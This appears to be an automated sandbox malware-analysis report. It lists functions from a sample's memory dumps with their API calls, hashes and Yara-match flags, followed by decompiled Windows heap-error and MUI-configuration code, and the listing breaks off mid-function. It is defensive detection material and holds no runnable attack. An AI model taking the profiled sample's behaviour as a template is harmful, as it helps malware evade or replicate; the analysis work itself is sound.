            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: 3c18e9b23026887bd6581bdf53e5076660e7fb001c5c53d2ae3711616687b3c0
            • Instruction ID: 3b039e0590a6c210212479d54bb4f3d60e0b5d6ec0d595e32ef9395d1ee57853
            • Opcode Fuzzy Hash: 3c18e9b23026887bd6581bdf53e5076660e7fb001c5c53d2ae3711616687b3c0
            • Instruction Fuzzy Hash: ED9002A962300006F5807169540864A04059BD1246F91D416A0007558CCA59D86A6361
            Uniqueness

            Uniqueness Score: -1.00%

            Function 02E58C50, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
            Download Yara Rule
            APIs
            • Sleep.KERNELBASE(000007D0), ref: 02E58CF8
            Strings
            Memory Dump Source
            • Source File: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Offset: 02E40000, based on PE: false
            Yara matches
            Similarity
            • API ID: Sleep
            • String ID: net.dll$wininet.dll
            • API String ID: 3472027048-1269752229
            • Opcode ID: 27be151a9e0d6c4fe89c7665854f30663a67aaeff252da0fbd6a8648570fa66b
            • Instruction ID: 15476c87196b0f5c9964e2b2a78f9726af0e8c8c547c58274696e3d50f2ad84b
            • Opcode Fuzzy Hash: 27be151a9e0d6c4fe89c7665854f30663a67aaeff252da0fbd6a8648570fa66b
            • Instruction Fuzzy Hash: EB3181B2540644BBC724DF64D884FA7B7F9AF48704F00851DFA2AAB241DB31A690CFA4
            Uniqueness

            Uniqueness Score: -1.00%

            Function 02E58C48, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 78sleepCOMMON
            Download Yara Rule
            APIs
            • Sleep.KERNELBASE(000007D0), ref: 02E58CF8
            Strings
            Memory Dump Source
            • Source File: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Offset: 02E40000, based on PE: false
            Yara matches
            Similarity
            • API ID: Sleep
            • String ID: net.dll$wininet.dll
            • API String ID: 3472027048-1269752229
            • Opcode ID: 862c833e14c0bdfb4f1876fb14f5425961e18a73c113337c94da7648eaeaf9d3
            • Instruction ID: dc6cc287e9ffe87893cf7a3a45035f89052a13d0095f8fcb5a35e22c2351c71f
            • Opcode Fuzzy Hash: 862c833e14c0bdfb4f1876fb14f5425961e18a73c113337c94da7648eaeaf9d3
            • Instruction Fuzzy Hash: F121A2B1580744ABD720DF64C8C5BAAB7B5FF48704F00C01DEA296B241D771A690CFA4
            Uniqueness

            Uniqueness Score: -1.00%

            Function 02E5A240, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
            Download Yara Rule
            APIs
            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02E43AF8), ref: 02E5A26D
            Strings
            Memory Dump Source
            • Source File: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Offset: 02E40000, based on PE: false
            Yara matches
            Similarity
            • API ID: FreeHeap
            • String ID: .z`
            • API String ID: 3298025750-1441809116
            • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
            • Instruction ID: ecccc3f60200118bf1cbd0d01152dcd1230c93d39f0601d338c75f60d407b7d4
            • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
            • Instruction Fuzzy Hash: 1AE046B1210218ABDB18EF99CC48EA777ADEF88750F018659FE085B341C630F910CAF0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 02E482E8, Relevance: 3.1, APIs: 2, Instructions: 57threadwindowCOMMON
            Download Yara Rule
            APIs
            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02E4834A
            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02E4836B
            Memory Dump Source
            • Source File: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Offset: 02E40000, based on PE: false
            Yara matches
            Similarity
            • API ID: MessagePostThread
            • String ID:
            • API String ID: 1836367815-0
            • Opcode ID: 0cdbbfc7d916bb54955fb5c17b314cf0d6ae7cf26959e0bcb64d011d43216673
            • Instruction ID: 65ade1b32d040b6cff5a78b4204a46d6ae33a16edee1692c8d45d145553dc1a5
            • Opcode Fuzzy Hash: 0cdbbfc7d916bb54955fb5c17b314cf0d6ae7cf26959e0bcb64d011d43216673
            • Instruction Fuzzy Hash: 9901D831AD02287BE720AA94AC02FFE772D5B40B54F048015FF04BA1C1EA94660547E1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 02E482F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
            Download Yara Rule
            APIs
            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02E4834A
            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02E4836B
            Memory Dump Source
            • Source File: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Offset: 02E40000, based on PE: false
            Yara matches
            Similarity
            • API ID: MessagePostThread
            • String ID:
            • API String ID: 1836367815-0
            • Opcode ID: da21c3352d2c5d1e9cbb8f90683f5c8b4db3c1cabdf29c5ef604bd67f1c16db5
            • Instruction ID: e56cdb38ec9ecfb2c40c7c8bf4805e80a2d7d1879a2293b8a7c3dbf34b15a03d
            • Opcode Fuzzy Hash: da21c3352d2c5d1e9cbb8f90683f5c8b4db3c1cabdf29c5ef604bd67f1c16db5
            • Instruction Fuzzy Hash: 8901A731AD03287BEB21A694AC02FFE776C6B40B55F148119FF04BA1C1EA946A0546F5
            Uniqueness

            Uniqueness Score: -1.00%

            Function 02E4ACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
            Download Yara Rule
            APIs
            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02E4AD42
            Memory Dump Source
            • Source File: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Offset: 02E40000, based on PE: false
            Yara matches
            Similarity
            • API ID: Load
            • String ID:
            • API String ID: 2234796835-0
            • Opcode ID: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
            • Instruction ID: 7e41ad94a3f7c3bfa1d019e345e9dab744e6a7ae4808432c20e82c3db713ad87
            • Opcode Fuzzy Hash: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
            • Instruction Fuzzy Hash: 78011EB5D8020DBBDB10EAA4EC51FDEB3799B44308F1091A5ED0997280FA31E754CB91
            Uniqueness

            Uniqueness Score: -1.00%

            Function 02E5A2AD, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
            Download Yara Rule
            APIs
            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02E5A304
            Memory Dump Source
            • Source File: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Offset: 02E40000, based on PE: false
            Yara matches
            Similarity
            • API ID: CreateInternalProcess
            • String ID:
            • API String ID: 2186235152-0
            • Opcode ID: 88a2d86f8b75480ac9d9c4c0dfab5e0854cdf932a7465a3d48ce94a3f2de4636
            • Instruction ID: 3c1cb2f2de2ac8cc4f1de3ef059ba29716dd617ed5082468e1df9c0dd49d3da2
            • Opcode Fuzzy Hash: 88a2d86f8b75480ac9d9c4c0dfab5e0854cdf932a7465a3d48ce94a3f2de4636
            • Instruction Fuzzy Hash: 4B01AFB2254108AFCB58DF99DC90EEB37AAAF8C754F158258FA0DD7240C630E851CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 02E5A2B0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
            Download Yara Rule
            APIs
            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02E5A304
            Memory Dump Source
            • Source File: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Offset: 02E40000, based on PE: false
            Yara matches
            Similarity
            • API ID: CreateInternalProcess
            • String ID:
            • API String ID: 2186235152-0
            • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
            • Instruction ID: 69a75aacd785d0a17fddf3411b82b63bf1f15ac8ba6dc085cf72c107757022e3
            • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
            • Instruction Fuzzy Hash: D701B2B2210108BFCB54DF89DC90EEB77AEAF8C754F158258FA0D97240C630E851CBA4
            Uniqueness

            Uniqueness Score: -1.00%

            Function 02E58D80, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
            Download Yara Rule
            APIs
            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02E4F020,?,?,00000000), ref: 02E58DBC
            Memory Dump Source
            • Source File: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Offset: 02E40000, based on PE: false
            Yara matches
            Similarity
            • API ID: CreateThread
            • String ID:
            • API String ID: 2422867632-0
            • Opcode ID: 7dbd3d3ac7649bff7e69916e6ba891b68e71841462a5c44576f4ed8f9012fe9e
            • Instruction ID: 367e4b7e7dd6e55528bf8e0f0c0917b7a8d4a363a4e02aa860fe005f6092f22f
            • Opcode Fuzzy Hash: 7dbd3d3ac7649bff7e69916e6ba891b68e71841462a5c44576f4ed8f9012fe9e
            • Instruction Fuzzy Hash: 06E092333E03143AE330699DAC02FA7B39CCB91B25F544026FB0DEB2C0D995F44146A4
            Uniqueness

            Uniqueness Score: -1.00%

            Function 02E5A200, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
            Download Yara Rule
            APIs
            • RtlAllocateHeap.NTDLL(02E54506,?,02E54C7F,02E54C7F,?,02E54506,?,?,?,?,?,00000000,00000000,?), ref: 02E5A22D
            Memory Dump Source
            • Source File: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Offset: 02E40000, based on PE: false
            Yara matches
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
            • Instruction ID: 0413ae3b2dc7f27cc7af88827f0b6e787bef7f2c89d56973f0a47158047cfe49
            • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
            • Instruction Fuzzy Hash: 0BE012B1210218ABDB14EF99CC40EA777ADAF88650F118659BE085B241C630F9118AF0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 02E5A3A0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
            Download Yara Rule
            APIs
            • LookupPrivilegeValueW.ADVAPI32(00000000,?,02E4F1A2,02E4F1A2,?,00000000,?,?), ref: 02E5A3D0
            Memory Dump Source
            • Source File: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Offset: 02E40000, based on PE: false
            Yara matches
            Similarity
            • API ID: LookupPrivilegeValue
            • String ID:
            • API String ID: 3899507212-0
            • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
            • Instruction ID: 36ab10db9beb79d2346b7cfcf712a3fde9fe00a54175e6825c467f8548e8701f
            • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
            • Instruction Fuzzy Hash: 7DE01AB12102186BDB10DF49CC84EE737ADAF88650F018165BE0857241C930E8118BF5
            Uniqueness

            Uniqueness Score: -1.00%

            Function 02E4F697, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
            Download Yara Rule
            APIs
            • SetErrorMode.KERNELBASE(00008003,?,02E48CF4,?), ref: 02E4F6CB
            Memory Dump Source
            • Source File: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Offset: 02E40000, based on PE: false
            Yara matches
            Similarity
            • API ID: ErrorMode
            • String ID:
            • API String ID: 2340568224-0
            • Opcode ID: 52290f3c5ed973d7b54808ce33706a972a8e16d5d6ad1cf5c88ab95ee02c2060
            • Instruction ID: 043b42c3aa3e2d1b775187f13863467479cee405257dccb6e19fbf35c9f5db2e
            • Opcode Fuzzy Hash: 52290f3c5ed973d7b54808ce33706a972a8e16d5d6ad1cf5c88ab95ee02c2060
            • Instruction Fuzzy Hash: FDD05E767F03053AEA11EEE8AC07F26328AAB54A54F4944A4FA49DB2C3DA50D50185A1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 02E4F6A0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
            Download Yara Rule
            APIs
            • SetErrorMode.KERNELBASE(00008003,?,02E48CF4,?), ref: 02E4F6CB
            Memory Dump Source
            • Source File: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Offset: 02E40000, based on PE: false
            Yara matches
            Similarity
            • API ID: ErrorMode
            • String ID:
            • API String ID: 2340568224-0
            • Opcode ID: 7ea49bcfd7eb89cfce1dd1d38e7dcc5e35a49d50de701d0c82c68256bf4518e3
            • Instruction ID: 297e4dbb523b929a9afa0a57a1a1a72fcbe90eae462aab7f20b9cb6557d1d1b0
            • Opcode Fuzzy Hash: 7ea49bcfd7eb89cfce1dd1d38e7dcc5e35a49d50de701d0c82c68256bf4518e3
            • Instruction Fuzzy Hash: 1AD05E616A03043AE610AAA49C02F2632895B44A04F494064FA499A2C3DD50E0004565
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0446967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: 7d2ff9bcdc0ff37d38b9381c50bca6e83e39baecdffcf9a45f30257e96589682
            • Instruction ID: 1a2a13d3b6de624523022c3ecef79d6a6c7a86862a83393e34ecc2e1b9724a23
            • Opcode Fuzzy Hash: 7d2ff9bcdc0ff37d38b9381c50bca6e83e39baecdffcf9a45f30257e96589682
            • Instruction Fuzzy Hash: C1B04CB19015C589FB119760460861779006BD0745F16C052D1021651A4778D091F5B6
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            Function 044DB260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
            Download Yara Rule
            Strings
            • The critical section is owned by thread %p., xrefs: 044DB3B9
            • The resource is owned shared by %d threads, xrefs: 044DB37E
            • write to, xrefs: 044DB4A6
            • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 044DB3D6
            • The instruction at %p referenced memory at %p., xrefs: 044DB432
            • *** A stack buffer overrun occurred in %ws:%s, xrefs: 044DB2F3
            • a NULL pointer, xrefs: 044DB4E0
            • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 044DB2DC
            • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 044DB323
            • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 044DB305
            • *** Resource timeout (%p) in %ws:%s, xrefs: 044DB352
            • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 044DB476
            • *** An Access Violation occurred in %ws:%s, xrefs: 044DB48F
            • *** then kb to get the faulting stack, xrefs: 044DB51C
            • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 044DB47D
            • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 044DB53F
            • The resource is owned exclusively by thread %p, xrefs: 044DB374
            • Go determine why that thread has not released the critical section., xrefs: 044DB3C5
            • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 044DB314
            • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 044DB39B
            • <unknown>, xrefs: 044DB27E, 044DB2D1, 044DB350, 044DB399, 044DB417, 044DB48E
            • read from, xrefs: 044DB4AD, 044DB4B2
            • This failed because of error %Ix., xrefs: 044DB446
            • *** enter .cxr %p for the context, xrefs: 044DB50D
            • *** enter .exr %p for the exception record, xrefs: 044DB4F1
            • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 044DB38F
            • *** Inpage error in %ws:%s, xrefs: 044DB418
            • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 044DB484
            • The instruction at %p tried to %s , xrefs: 044DB4B6
            • an invalid address, %p, xrefs: 044DB4CF
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
            • API String ID: 0-108210295
            • Opcode ID: 76907fd0ac3a7b9ed16dd25b5c022fbaf33d809ae89d358b6dfc3705ec108431
            • Instruction ID: 9b6f4dfd95eabe0676ff7d4818c67afecf9f04318f7d4fe67ae88a11667bceb1
            • Opcode Fuzzy Hash: 76907fd0ac3a7b9ed16dd25b5c022fbaf33d809ae89d358b6dfc3705ec108431
            • Instruction Fuzzy Hash: D98127B5B00250FFEF229E069C56DAB7B26DF47759F02404BFA041B222E375B502DAB1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044E1C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
            Download Yara Rule
            C-Code - Quality: 44%
            			E044E1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x44048a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0442B150();
				} else {
					E0442B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x451589c);
				E0442B150("Heap error detected at %p (heap handle %p)\n",  *0x45158a0);
				_t27 =  *0x4515898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M044E1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0442B150();
				} else {
					E0442B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0442B150("Error code: %d - %s\n",  *0x4515898);
				_t113 =  *0x45158a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0442B150();
					} else {
						E0442B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0442B150("Parameter1: %p\n",  *0x45158a4);
				}
				_t115 =  *0x45158a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0442B150();
					} else {
						E0442B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0442B150("Parameter2: %p\n",  *0x45158a8);
				}
				_t117 =  *0x45158ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0442B150();
					} else {
						E0442B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0442B150("Parameter3: %p\n",  *0x45158ac);
				}
				_t119 =  *0x45158b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0442B150();
					} else {
						E0442B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x45158b4);
					E0442B150("Last known valid blocks: before - %p, after - %p\n",  *0x45158b0);
				} else {
					_t120 =  *0x45158b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0442B150();
				} else {
					E0442B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0442B150("Stack trace available at %p\n", 0x45158c0);
			}











            0x044e1c10
            0x044e1c16
            0x044e1c1e
            0x044e1c3d
            0x044e1c3e
            0x044e1c20
            0x044e1c35
            0x044e1c3a
            0x044e1c44
            0x044e1c55
            0x044e1c5a
            0x044e1c65
            0x044e1c67
            0x00000000
            0x044e1c6e
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x044e1c67
            0x044e1cdc
            0x044e1ce5
            0x044e1d04
            0x044e1d05
            0x044e1ce7
            0x044e1cfc
            0x044e1d01
            0x044e1d0b
            0x044e1d17
            0x044e1d1f
            0x044e1d25
            0x044e1d30
            0x044e1d4f
            0x044e1d50
            0x044e1d32
            0x044e1d47
            0x044e1d4c
            0x044e1d61
            0x044e1d67
            0x044e1d68
            0x044e1d6e
            0x044e1d79
            0x044e1d98
            0x044e1d99
            0x044e1d7b
            0x044e1d90
            0x044e1d95
            0x044e1daa
            0x044e1db0
            0x044e1db1
            0x044e1db7
            0x044e1dc2
            0x044e1de1
            0x044e1de2
            0x044e1dc4
            0x044e1dd9
            0x044e1dde
            0x044e1df3
            0x044e1df9
            0x044e1dfa
            0x044e1e00
            0x044e1e0a
            0x044e1e13
            0x044e1e32
            0x044e1e33
            0x044e1e15
            0x044e1e2a
            0x044e1e2f
            0x044e1e39
            0x044e1e4a
            0x044e1e02
            0x044e1e02
            0x044e1e08
            0x00000000
            0x00000000
            0x044e1e08
            0x044e1e5b
            0x044e1e7a
            0x044e1e7b
            0x044e1e5d
            0x044e1e72
            0x044e1e77
            0x044e1e95

            Strings
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
            • API String ID: 0-2897834094
            • Opcode ID: 576b3d5559709e4ec00ebf2b071c45f49468174d80c884323eacb53f3773793e
            • Instruction ID: 7313d00f420a53db3fa64d0513518bd77e369af9c4c495a671397246b5d38a35
            • Opcode Fuzzy Hash: 576b3d5559709e4ec00ebf2b071c45f49468174d80c884323eacb53f3773793e
            • Instruction Fuzzy Hash: 48610C37650154EFEE119B87D585E3173A4E704A72BA9C02FF90A6B321E638FC51AF09
            Uniqueness

            Uniqueness Score: -1.00%

            Function 04433D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
            Download Yara Rule
            C-Code - Quality: 96%
            			E04433D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E04431B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E04431B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E04431B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E04431B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E04431B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L04444620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0446F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E04471370(_t276, 0x4404e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0446BB40(0,  &_v68, _t170);
									if(L044343C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
